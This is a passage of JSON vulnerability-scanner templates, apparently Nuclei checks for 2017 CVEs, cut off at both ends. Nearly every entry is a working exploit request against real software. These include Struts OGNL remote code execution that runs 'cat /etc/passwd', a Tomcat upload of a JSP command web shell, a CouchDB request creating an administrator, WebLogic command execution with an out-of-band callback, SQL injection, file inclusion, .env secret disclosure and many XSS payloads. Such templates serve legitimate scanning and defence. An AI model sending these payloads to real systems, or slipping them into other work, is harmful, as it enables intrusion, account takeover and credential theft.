Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["
  • ","passwd
  • "],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["JBoss","ClassCastException"],"condition":"and","case-insensitive":true},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\">All\")","contains(body_3, \"Updater by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-18530","info":{"name":"Rating by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Rating by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18494","info":{"name":"Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Custom Search by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18518","info":{"name":"SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"SMTP by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\n\n{\n \"type\": \"user\",\n \"name\": \"poc\",\n \"roles\": [\"_admin\"],\n \"roles\": [],\n \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18516","info":{"name":"LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"LinkedIn by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Mailster ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"
    \");\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Raygun4WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18556","info":{"name":"Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Google Analytics by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18527","info":{"name":"Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Pagination by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n\n\n \n \n \n \n \n \n /bin/bash\n \n \n -c\n \n \n ping -c 1 {{interactsh-url}}\n \n \n \n \n \n \n \n\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n\n \n \n \n \n \n \n \n \n \n \n {{randstr}}\n \n \n \n \n \n \n \n\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"java.lang.ProcessBuilder || 0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18528","info":{"name":"PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"PDF & Print by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"\"."]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18487","info":{"name":"AdPush < 1.44 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Google AdSense\")"],"condition":"and"}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n\n \n \n \n \n http://{{interactsh-url}}\n \n \n \n \n \n \n \n \n\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18566","info":{"name":"User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"User Role by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18517","info":{"name":"Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Pinterest by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18501","info":{"name":"Social Login by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Social Login by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18558","info":{"name":"Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Testimonials by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-3133","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\nDNT: 1\n\ncsrfmiddlewaretoken={{csrf}}&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%0A\n","GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":[""]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"header","name":"csrf","group":2,"regex":["ccsrftoken_([0-9_a-z]+)=\"([A-Z0-9]+)\";"],"internal":true}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: "]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status",